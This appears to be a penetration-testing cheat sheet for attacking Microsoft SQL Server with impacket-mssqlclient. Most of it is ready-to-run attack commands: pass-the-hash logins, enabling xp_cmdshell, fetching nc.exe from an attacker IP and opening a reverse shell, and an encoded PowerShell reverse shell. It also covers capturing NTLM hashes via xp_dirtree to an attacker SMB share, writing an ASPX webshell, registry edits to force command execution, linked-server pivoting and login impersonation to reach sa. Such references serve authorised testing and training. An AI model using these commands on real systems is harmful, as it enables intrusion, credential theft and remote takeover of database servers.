Skip to main content

Overview

impacket-mssqlclient is an interactive MSSQL client that supports SQL auth, Windows/NTLM auth, pass-the-hash, and Kerberos. Once connected, escalate from database access to OS command execution, file reads, and lateral movement. 
pip install impacket

Authentication

SQL Authentication

impacket-mssqlclient sa:'P@ssw0rd!'@10.10.10.20

Windows Authentication

impacket-mssqlclient corp.local/dbadmin:'P@ssw0rd!'@10.10.10.20 -windows-auth

Pass-the-Hash

impacket-mssqlclient corp.local/[email protected] -windows-auth -hashes :aad3b435b51404eeaad3b435b51404ee

Kerberos Authentication

# With a ccache file
export KRB5CCNAME=dbadmin.ccache
impacket-mssqlclient -k -no-pass DC01.corp.local

# Specify DC for KDC
impacket-mssqlclient -k -no-pass -dc-ip 10.10.10.1 MSSQL01.corp.local

Custom Port

impacket-mssqlclient sa:'P@ssw0rd!'@10.10.10.20 -port 1434

Basic Connection

impacket-mssqlclient sa:'P@ssw0rd!'@10.10.10.20 -windows-auth
Once connected, you get an interactive SQL prompt: 
-- Check current user and privileges
SELECT SYSTEM_USER;
SELECT USER_NAME();
SELECT IS_SRVROLEMEMBER('sysadmin');

-- List databases
SELECT name FROM sys.databases;

-- List tables in a database
USE targetdb;
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;

-- Query data
SELECT TOP 10 * FROM dbo.users;

Enable xp_cmdshell

xp_cmdshell executes OS commands. Disabled by default — requires sysadmin to enable.

Via sp_configure

-- Enable advanced options
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;

-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Using the Built-in Command

The mssqlclient shell has a shortcut: 
SQL> enable_xp_cmdshell

Execute OS Commands via xp_cmdshell

-- Basic command execution
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig /all';
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\flag.txt';

-- Download and execute payload
EXEC xp_cmdshell 'powershell -c "IWR http://10.10.14.5/nc.exe -OutFile C:\temp\nc.exe"';
EXEC xp_cmdshell 'C:\temp\nc.exe 10.10.14.5 4444 -e cmd.exe';

-- Reverse shell (PowerShell one-liner)
EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0A...';

File Read

OPENROWSET

-- Read a file via OPENROWSET (requires Ad Hoc Distributed Queries enabled)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1;
RECONFIGURE;

SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS Contents;
SELECT * FROM OPENROWSET(BULK 'C:\inetpub\wwwroot\web.config', SINGLE_CLOB) AS Contents;

BULK INSERT

-- Bulk insert file into a temp table
CREATE TABLE #file (line VARCHAR(MAX));
BULK INSERT #file FROM 'C:\Windows\System32\drivers\etc\hosts';
SELECT * FROM #file;
DROP TABLE #file;

Capture NTLM Hash via xp_dirtree

Force the MSSQL service account to authenticate to your SMB server, capturing its NetNTLMv2 hash. 
# On attacker — start SMB server
impacket-smbserver SHARE /tmp -smb2support

-- On MSSQL — trigger UNC access
EXEC xp_dirtree '\\10.10.14.5\SHARE', 1, 1;

-- Alternatives
EXEC xp_fileexist '\\10.10.14.5\SHARE\test';
EXEC master..xp_subdirs '\\10.10.14.5\SHARE\';
The MSSQL service account hash appears on your SMB server. Crack it or relay it. 
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Linked Servers

Linked servers allow querying remote MSSQL instances through the current one. They often run with elevated privileges.

Enumerate Linked Servers

-- List linked servers
EXEC sp_linkedservers;
SELECT * FROM sys.servers;

-- Check who the link runs as
SELECT srvname, srvproduct, isremote, islinked FROM sys.sysservers;

-- Test RPC to linked server
EXEC ('SELECT SYSTEM_USER') AT [LINKED-SRV];
EXEC ('SELECT IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKED-SRV];

-- Execute a query on the linked server
EXEC ('SELECT @@SERVERNAME') AT [LINKED-SRV];

-- Enable xp_cmdshell on linked server (if sysadmin on that link)
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [LINKED-SRV];
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [LINKED-SRV];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED-SRV];

-- Double hop: linked server → another linked server
EXEC ('EXEC (''SELECT SYSTEM_USER'') AT [LINKED-SRV-2]') AT [LINKED-SRV-1];

Ole Automation Procedures

sp_OACreate provides an alternative to xp_cmdshell for command execution and file operations.

Enable Ole Automation

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

Write a File

# Write a webshell or payload to disk

DECLARE @ole INT;
DECLARE @file INT;
EXEC sp_OACreate 'Scripting.FileSystemObject', @ole OUT;
EXEC sp_OAMethod @ole, 'CreateTextFile', @file OUT, 'C:\inetpub\wwwroot\cmd.aspx', 1;
EXEC sp_OAMethod @file, 'WriteLine', NULL, '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", "/c " + Request["cmd"]); %>';
EXEC sp_OAMethod @file, 'Close';
EXEC sp_OADestroy @file;
EXEC sp_OADestroy @ole;

Execute a Command via Ole Automation

DECLARE @output INT;
EXEC sp_OACreate 'WScript.Shell', @output OUT;
EXEC sp_OAMethod @output, 'Run', NULL, 'cmd.exe /c whoami > C:\temp\output.txt';
EXEC sp_OADestroy @output;

Enable xp_cmdshell via Ole Automation

When sp_configure is blocked (trigger/policy), use Ole Automation to modify the registry directly and enable xp_cmdshell. 
-- Enable Ole Automation first (if not already)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;

-- Write registry key to enable xp_cmdshell
DECLARE @reg INT;
EXEC sp_OACreate 'WScript.Shell', @reg OUT;
EXEC sp_OAMethod @reg, 'RegWrite', NULL, 'HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQLServer\Configuration\xp_cmdshell', 1, 'REG_DWORD';
EXEC sp_OADestroy @reg;

-- Alternatively, use xp_regwrite (if available)
EXEC xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQLServer\Configuration', 'xp_cmdshell', 'REG_DWORD', 1;
After modifying the registry, restart the SQL service or try RECONFIGURE to apply changes.

EXECUTE AS LOGIN (Impersonation)

If your user has impersonation privileges, escalate by executing as a more privileged login.

Enumerate Impersonation Privileges

-- Check who the current user can impersonate
SELECT
    dp.name AS principal,
    dp2.name AS can_impersonate
FROM sys.server_permissions perm
JOIN sys.server_principals dp ON perm.grantor_principal_id = dp.principal_id
JOIN sys.server_principals dp2 ON perm.grantee_principal_id = dp2.principal_id
WHERE perm.type = 'IM';

-- Simpler check
SELECT DISTINCT b.name
FROM sys.server_permissions a
JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

Impersonate and Escalate

-- Impersonate the sa login
EXECUTE AS LOGIN = 'sa';

-- Verify
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');

-- Now enable xp_cmdshell as sa
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

-- Revert to original context
REVERT;

Database-Level Impersonation

-- Impersonate a database user (not server login)
USE targetdb;
EXECUTE AS USER = 'dbo';

-- Check
SELECT USER_NAME();

Quick Reference

TaskCommand / Query
SQL auth connectimpacket-mssqlclient sa:'pass'@HOST
Windows authimpacket-mssqlclient DOMAIN/user:'pass'@HOST -windows-auth
Pass-the-hashimpacket-mssqlclient DOMAIN/user@HOST -windows-auth -hashes :NTLM
Kerberos authimpacket-mssqlclient -k -no-pass HOST
Check sysadminSELECT IS_SRVROLEMEMBER('sysadmin')
Enable xp_cmdshellenable_xp_cmdshell (mssqlclient shortcut)
OS commandEXEC xp_cmdshell 'whoami'
Read fileSELECT * FROM OPENROWSET(BULK 'path', SINGLE_CLOB) AS c
Capture NTLM hashEXEC xp_dirtree '\\ATTACKER\SHARE'
List linked serversEXEC sp_linkedservers
Exec on linked serverEXEC ('query') AT [LINKED-SRV]
Ole Automation execsp_OACreate 'WScript.Shell' + sp_OAMethod 'Run'
Impersonate loginEXECUTE AS LOGIN = 'sa'
Check impersonationQuery sys.server_permissions where type = 'IM'